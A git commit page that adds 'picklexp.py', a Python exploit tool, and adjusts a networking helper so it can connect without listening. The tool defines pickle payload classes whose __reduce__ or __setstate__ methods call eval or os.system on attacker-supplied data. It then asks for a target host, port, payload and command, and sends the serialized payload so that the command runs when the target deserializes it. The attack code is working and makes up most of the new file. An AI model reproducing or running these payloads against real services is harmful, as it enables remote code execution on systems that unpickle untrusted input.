Add exploit tester!
This commit is contained in:
parent
b28c9925b9
commit
96d9e430b2
13
networker.py
13
networker.py
@ -100,14 +100,19 @@ class Connection:
|
||||
threads = dict()
|
||||
actives = dict()
|
||||
def __init__(self, binder, translator, onconn, onrecv, onend):
|
||||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.socket.bind(binder)
|
||||
self.socket.listen(8)
|
||||
if binder != None:
|
||||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.socket.bind(binder)
|
||||
self.socket.listen(8)
|
||||
else:
|
||||
self.socket = None
|
||||
self.translator = translator
|
||||
self.onconn = onconn
|
||||
self.onrecv = onrecv
|
||||
self.onend = onend
|
||||
def listener(self):
|
||||
if self.socket == None:
|
||||
return
|
||||
while self.active:
|
||||
s, a = self.socket.accept()
|
||||
ac = a[0] + ":" + str(a[1])
|
||||
@ -193,7 +198,7 @@ class Connection:
|
||||
break
|
||||
time.sleep(0.0001)
|
||||
self.threads.clear()
|
||||
self.socket.close()
|
||||
if self.socket != None: self.socket.close()
|
||||
|
||||
def addresses(self):
|
||||
if self.active:
|
||||
|
95
picklexp.py
Normal file
95
picklexp.py
Normal file
@ -0,0 +1,95 @@
|
||||
#BSD 3-Clause, (C) Alfred Manville 2022
|
||||
#Be RESPONSIBLE when using this!
|
||||
import networker as net
|
||||
import pickle
|
||||
import traceback
|
||||
import sys
|
||||
|
||||
#Payloads:
|
||||
#State payloads only work if the Object is available at the target
|
||||
|
||||
class StatePXP:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
def __getstate__(self):
|
||||
return self.data
|
||||
def __setstate__(self, state):
|
||||
self.data = state
|
||||
print(self.data)
|
||||
|
||||
class ReducePXP:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
def __reduce__(self):
|
||||
return print, (self.data,)
|
||||
|
||||
class StateEXP:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
def __getstate__(self):
|
||||
return self.data
|
||||
def __setstate__(self, state):
|
||||
self.data = state
|
||||
eval(self.data)
|
||||
|
||||
class ReduceEXP:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
def __reduce__(self):
|
||||
return eval, (self.data,)
|
||||
|
||||
class ReduceSXP:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
def __reduce__(self):
|
||||
import os
|
||||
return os.system, (self.data,)
|
||||
|
||||
payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
|
||||
payload = None
|
||||
taddr = ""
|
||||
tport = 0
|
||||
plid = 0
|
||||
pldata = ""
|
||||
|
||||
def onx(a):
|
||||
pass
|
||||
|
||||
def ony(a, m):
|
||||
pass
|
||||
|
||||
def main():
|
||||
conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
|
||||
print("Running Exploit @ " + taddr + ":" + str(tport))
|
||||
print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
|
||||
try:
|
||||
conn.connect((taddr, tport))
|
||||
print("Exploiting...")
|
||||
conn.send(taddr+":"+str(tport), payload)
|
||||
print("Exploited!")
|
||||
except:
|
||||
print(traceback.format_exc())
|
||||
conn.close()
|
||||
exit
|
||||
|
||||
if __name__ == "__main__":
|
||||
print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
|
||||
if len(sys.argv) > 1:
|
||||
taddr = sys.argv[1]
|
||||
else:
|
||||
taddr = input("Enter the target address: ")
|
||||
if len(sys.argv) > 2:
|
||||
tport = int(sys.argv[2])
|
||||
else:
|
||||
tport = int(input("Enter the target port: "))
|
||||
if len(sys.argv) > 3:
|
||||
plid = int(sys.argv[3]) - 1
|
||||
else:
|
||||
plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
|
||||
if len(sys.argv) > 4:
|
||||
pldata = sys.argv[4]
|
||||
else:
|
||||
pldata = input("Enter the payload data: ")
|
||||
payload = payloads[plid]
|
||||
payload.data = pldata
|
||||
main()
|
Loading…
Reference in New Issue
Block a user